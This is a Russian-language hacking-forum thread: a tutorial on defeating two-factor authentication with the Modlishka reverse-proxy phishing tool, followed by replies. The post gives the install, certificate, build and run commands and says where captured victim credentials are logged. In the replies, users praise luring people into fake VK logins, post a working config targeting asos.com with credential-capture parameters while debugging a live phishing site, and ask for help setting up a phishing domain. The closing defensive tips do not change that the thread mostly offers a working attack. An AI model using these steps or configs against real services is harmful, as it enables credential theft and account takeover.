Статья Обход Двухфакторной аутентификации c помощью "Modlishka"

Доброе время суток, уважаемые форумчане! Сегодня я вам расскажу о довольно лёгком способе обойти двухфакторную аутентификацию, Уже очень давно в интернете говорят о том, что двухфакторная аутентификация наиболее безопасна, и о том что ее сложно обойти, но это не так. Наверное все знают что большая уязвимость в нынешней системе это человеческий фактор.Так как не нужно использовать эксплойты, и искать различные уязвимости техники. В этой статье я расскажу о том, как обойти двухфакторную аутентификацию с помощью инструмента “Modlishka”, Этот инструмент должен быть очень полезен для тех кто проводит тесты на проникновение, для тех кто хочет провести хорошую фишинговую атаку.

Обход двухфакторной аутентификации​

1)Скачивание инструмента

$ go get -u github.com/drk1wi/Modlishka
$ cd $GOPATH/src/github.com/drk1wi/Modlishka/

2) Настройка плагина “autocert”

Производить настройку нужно только если вы хотите провести фишинговую атаку по доверенному каналу браузера TLS

$ openssl genrsa -out MyRootCA.key 2048`
$ openssl req -x509 -new -nodes -key MyRootCA.key -sha256 -days 1024 -out MyRootCA.pem

Замените переменную const CA_CERT содержимым файла MyRootCA.pem, а const CA_CERT_KEY содержимым MyRootCA.key в файле который находится по пути plugin/autocert.go.

3) Скомпилируйте и запустите тестовую конфигурацию “Modlishka”

$ make
$ sudo ./dist/proxy -config templates/google.com_gsuite.json

Данная ссылка может быть использована для просмотра запущенной тестовой страницы. Вы можете заметить, как параметр « ident » скрыт от пользователя при первом запросе:

Ссылка скрыта от гостей

.

Собранные учетные данные жертвы можно найти в файле 'log' или с помощью одного из включенных плагинов:

4) Настройте свои параметры

Если вам нравится инструмент. Вы можете начать настройку конфигурации для выбранного вами домена. Модлишка может быть легко настроена с помощью набора доступных параметров командной строки или файлов конфигурации JSON.

Итог
​

Вы наверное думаете что двухфакторная авторизация сломалась?
Нет, но с правильным обратным прокси-сервером, нацеленным на ваш домен по зашифрованному каналу связи, которому доверяет браузер, взаправду можно не заметить, что что-то не так.

Если учесть отсутствие осведомленности пользователей, это означает, что вы отдаете свои ценные активы.
В конце концов, даже сложные системы защиты безопасности могут выйти из строя, если не будет достаточной осведомленности пользователей и наоборот.
В данный момент единственный способ решения этой проблемы с технической точки зрения - полностью полагаться на аппаратные токены двухфакторной аутентификации, основанные на протоколе U2F . Вы можете легко купить их онлайн. Однако не стоит забывать, что правильная осведомленность пользователей не менее важна.
Немножко советов:
1)используйте аппаратные токены U2F в качестве второго фактора аутентификации.

2)используйте менеджеры паролей, которые будут проверять правильность имени домена в вашем браузере, прежде чем вставлять пароль.

3)постоянно повышать осведомленность пользователей о нынешних методах социальной инженерии.

Мне кажется, что без рабочего доказательства концепции, которая на самом деле доказывает эту точку зрения, риск рассматривается как теоретический, и никаких мер для надлежащего решения не предпринимается. отсутствие правильной осведомленности о риске является подходящей ситуацией для злоумышленников, которые с радостью воспользуются ей.

P.S. Я не призываю проводить фишинговые атаки против компаний. Но чтобы вы были осведомлены о риске, использую один популярный сервис в качестве доказательства концепции.


На этом всё, спасибо за уделенное внимание, и драгоценные минуты времени. Удачи!

 

[N4G4]

На самом деле тебе не кажется, дело в том что человек не всегда бдителен, а ведомый своими инстинктами и вообще может очень сильно обжечься, я тут как то проводил эксперимент, есть браузер с отключенным яваскриптом, если выключено всё то почти все порно сайты не работают, так вот человек наплевав на свою безопасность отключил их и все таки посещал такие сайты. Более того, если человеку понравилась картинка с девочкой, но когда тыкаешь на кнопочку "получить все фото" выпадает окно авторизации в вк, он вводит данные даже не задумываясь, потому-что он сейчас возбужден и вопрос безопасности в его мозгу на втором плане, печально что даже понимая это человек может все равно зайти. Забавная штука человеческий мозг. Тема грязная но рабочая)

 

[Глюк]

На самом деле тебе не кажется, дело в том что человек не всегда бдителен, а ведомый своими инстинктами и вообще может очень сильно обжечься, я тут как то проводил эксперимент, есть браузер с отключенным яваскриптом, если выключено всё то почти все порно сайты не работают, так вот человек наплевав на свою безопасность отключил их и все таки посещал такие сайты. Более того, если человеку понравилась картинка с девочкой, но когда тыкаешь на кнопочку "получить все фото" выпадает окно авторизации в вк, он вводит данные даже не задумываясь, потому-что он сейчас возбужден и вопрос безопасности в его мозгу на втором плане, печально что даже понимая это человек может все равно зайти. Забавная штука человеческий мозг. Тема грязная но рабочая)

согласен на 100500%. во время любого эмоционального всплеска, мыслительные процессы в мозгу отключаются. и человеческое существо переходит в режим "автопилота", т.е. на работу по программе "животный инстинкт". эта программа усиливается при выбросе адреналина. "хлеба и зрелищ", во все времена самая безотказная формула управления массами хомо эректусов. ))) так что, други, хоть это и грязная тема, но пользоваться ей нужно. хотя бы для того, чтобы научить "глупых хазар" включать голову во время "животных желаний". )))

 

[Den11]

Что с этим делать?)

 

[SilentFish]

Что с этим делать?)

Просят ввести страну. Две буквы. RU - Россия; UA - Украина... и.т.п

Проблема, при редиректе на фишиговый сайт выходит белый экран. Настроено всё на сервере сама админка работает. Может какие то права надо, кто подскажет? На всяких бордах и в гугле смотрел у всех такая же проблема.
asos.com_gsuite.json:

{
  "proxyDomain": "site.site",
  "listeningPort": "443",
  "listeningAddress": "ip_сервера",
  "target": "https://www.asos.com",
  "targetResources": "content.asos-media.com/?r=2,assets.asosservices.com",
  "rules": "",
  "terminateTriggers": "",
  "terminateRedirectUrl": "",
  "trackingCookie": "ident",
  "trackingParam": "ident",
  "jsRules":"",
  "jsReflectParam": "reflect",
  "debug": false,
  "forceHTTPS": false,
  "forceHTTP": false,
  "dynamicMode": false,
  "logPostOnly": false,
  "disableSecurity": false,
  "log": "asos.log",
  "plugins": "all",
  "credParams": "dHJ1ZVxdLCIoKD86XHcrW1wuXC1cX10pezAsfVx3KykiXQ==,XGJudWxsLFxbIihbYS16QS1aMC05IiEiIyQlJicoKSorLC0uLzo7PD0+P0BeX2B7fH1+XSspIixudWxsXGI=",
  "cert": "",
  "certKey": "",
  "certPool": ""
}

 

[Seledkad]

Если тема еще жива, может кто нибдуь более подробно расписать о настройке Modlishka для работы через фишинговый домен. У меня например есть домен,но я немного не могу понять, какие записи и как указать.